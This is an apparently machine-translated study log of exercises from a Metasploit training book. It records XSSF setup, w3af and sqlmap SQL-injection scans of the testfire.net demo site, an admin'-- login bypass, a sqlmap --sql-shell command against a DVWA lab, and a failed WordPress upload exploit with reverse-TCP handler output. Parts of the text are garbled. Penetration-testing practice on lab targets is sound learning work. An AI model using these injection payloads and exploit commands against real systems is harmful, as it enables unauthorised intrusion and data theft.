p163 XSSF
The default Kali 2.0 does not have XSSF, first download: https://code.google.com/archive/p/xssf/downloads
Unzip the downloaded zip file, merge the data, plugins, lab and other folders into the appropriate folder in the/usr/share/metasploit-framework/, then load XSSF in Msfconsole.
According to the book, but the final attack did not succeed!
8 the ['...] ['exploit:windows/browser/ie_createobject'[*] Exploit execution Started, press [CTRL + C] to stop it! [+] Remaining victims to attack: [[1] (1)] (stop here to stay)^c[-] Exploit interrupted by the Console user
p180 Practical Work
1. Probing SQL injection vulnerability in www.testfire.net:
[Email protected]:~# w3af_console W3af>>>PLUGINSW3AF/plugins>>>Audit Sqli W3af/plugins>>>Crawl Web_spider w3af/plugins>>>BACKW3AF>>>TARGETW3AF/config:target>>> Set Target http://www.testfire.net/bank/login.aspxW3af/config:target>>>backthe configuration has been saved.w3af>>>PLUGINSW3AF/plugins>>>Output html_file w3af/plugins>>>output config html_file w3af/plugins/output/config:html_file>>>set verbose True w3af/plugins/output/config:html_file>>>backthe configuration has been saved.w3af/plugins>>>BACKW3AF>>> start
Successfully swept out 8 URLs and different injections points.
Sweep with Sqlmap.
" http://www.testfire.net/bank/login.aspx " " Uid=admin&passw=a&btnsubmit=login "
Detect some information from the background database
Easily login in http://www.testfire.net/bank/login.aspx by constructing admin '--input.
But how do you get the information in the database further? I'm not done yet.
2, according to the book p163 do can
3, WXF:HTTPS://GITHUB.COM/FORCED-REQUEST/WXF
Unzip after download, switch to unzip directory, run./console, prompt
/usr/lib/ruby/2.2. 0/rubygems/core_ext/kernel_require.rb:si: in ' Require': Cannot load such FILE--Iconv (Loaderror)
Because of the lack of familiarity with Ruby, the online approach also does not understand, skip.
4, I choose this vulnerability to test https://www.exploit-db.com/exploits/37182/
However, the resulting test results are:
Do not know whether the background Server software version issue.
5, do not know how to get. Skip first.
6. Successfully implanted SQL shell! with the following command
' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# ' --cookie='security=low; PHPSESSID=7918OEOATNUR63RQ8BOKN88SD2' --sql-shell
7, p177
Follow the prompts step-by-step, but without success:
[*] Started Reverse TCP handler on10.10.10.128:4444 [*] successfully uploaded shell. [*] Trying to access shell at <! DOCTYPE HTML Public"-//ietf//dtd HTML 2.0//en">Head><title>413Request Entity Too large</title></Head><body>The requested resource<BR/>/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br/>Does not allow request for data with POST requests, or the amount of data providedinchThe request exceeds the capacity limit.</body>... [*] Exploit completed, but no session is created.
"Metasploit Devil Training Camp" chapter fourth (under)